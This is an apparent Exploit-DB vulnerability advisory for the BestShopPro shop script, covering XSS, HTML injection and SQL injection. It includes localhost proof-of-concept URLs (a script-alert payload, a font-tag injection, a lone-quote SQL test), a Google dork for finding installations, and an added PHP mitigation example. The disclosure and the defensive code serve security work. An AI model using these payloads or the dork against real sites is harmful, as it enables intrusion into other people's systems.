Vendor: BestShopPro
By: CoBRa_21
CVSS: 8.8 (HIGH)
XSS, HTML, SQL Injection
CWE: 79, 89, 89
Product Name: BestShopPro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

BST – BestShopPro (nowosci.php) Multiple Vulnerabilities

The vulnerability exists in the nowosci.php page, which allows an attacker to inject malicious JavaScript code, HTML code, and SQL queries by sending a crafted HTTP request. In the proof-of-concept requests in the raw data below, the JavaScript and HTML payloads are carried in the str parameter of nowosci.php, and the SQL test is carried in the str parameter of pokaz_podkat.php.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the vulnerable page.
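
One way to apply that mitigation in PHP (an added example, not BestShopPro's code or part of the advisory): the reflected str value is HTML-encoded on output, and the query validates idkat, allow-lists order1 and binds str. The parameter meanings, the products table and both function names are assumptions, and the demo needs the pdo_sqlite extension.

```php
<?php
// Added example, not BestShopPro code. Parameter meanings (idkat = category id,
// order1 = sort key, str = search text), table and function names are assumptions.

// Encode the reflected search text for an HTML body context.
function render_search_term(string $str): string {
    return 'Results for: ' . htmlspecialchars($str, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate the numeric id, allow-list the sort column, bind the search text.
function list_products(PDO $db, $idkat, $order1, string $str): array {
    $id = filter_var($idkat, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('idkat must be a positive integer');
    }
    // Column names cannot be bound, so map the request value to a fixed identifier.
    $columns = ['1' => 'name', '2' => 'price'];
    $orderBy = $columns[(string) $order1] ?? 'name';
    // Escape LIKE wildcards so the text is matched literally.
    $like = '%' . strtr($str, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']) . '%';
    $stmt = $db->prepare(
        "SELECT name, price FROM products
         WHERE category_id = :idkat AND name LIKE :q ESCAPE '\\'
         ORDER BY $orderBy"
    );
    $stmt->bindValue(':idkat', $id, PDO::PARAM_INT);
    $stmt->bindValue(':q', $like, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (category_id INTEGER, name TEXT, price REAL)');
$db->exec("INSERT INTO products VALUES (10, 'Red lamp', 19.5), (10, 'Blue lamp', 12.0)");

// Markup from the request is printed as text, not interpreted by the browser.
echo render_search_term('<font color=red size=15>CoBRa_21</font>'), PHP_EOL;
// A lone quote is bound as data and cannot change the statement.
echo json_encode(list_products($db, '10', '1', "'")), PHP_EOL;
// Normal search, ordered by the allow-listed price column.
echo json_encode(list_products($db, '10', '2', 'lamp')), PHP_EOL;
// Non-numeric idkat is rejected before any SQL is built.
try {
    list_products($db, "10'", '1', 'lamp');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```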

Exploit-DB raw data:

################################################################################################
#  Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
#  Author : CoBRa_21 
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : "Powered By BST"
#
#  Script Page : http://www.bst.pl
################################################################################################
#
#  XSS:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
#  HTML:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
#  SQL :
#
#  http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################